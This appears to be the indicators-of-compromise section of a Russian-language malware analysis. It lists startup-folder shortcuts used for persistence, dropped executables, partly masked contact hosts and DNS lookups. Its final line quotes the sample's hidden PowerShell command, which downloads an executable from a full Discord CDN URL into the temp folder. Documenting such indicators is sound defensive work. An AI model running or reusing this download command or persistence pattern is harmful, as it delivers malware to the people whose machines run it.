Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\windows.lnk
- https://cdn.discordapp.com/attachments/805895461416337438/815335077784977478/yes.exe — загружается и сохраняется как %temp%\exploit.exe
- %TEMP%\exploit.exe
- %TEMP%\paylod.exe (написание «paylod» сохранено без исправления: то же имя повторяется ниже в списке)
- %TEMP%\hopstarter-soft-scraps-adobe-pdf-document.ico
- %APPDATA%\microsoft\windows\templates\windows.lnk
- 'cd#.##scordapp.com':443
- 'ra####g.ddns.net':9412
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- DNS ASK ra####g.ddns.net
- '%TEMP%\exploit.exe'
- '%TEMP%\paylod.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/805895461416337438/815335077784977478/yes.exe','%temp%\exploit.exe')...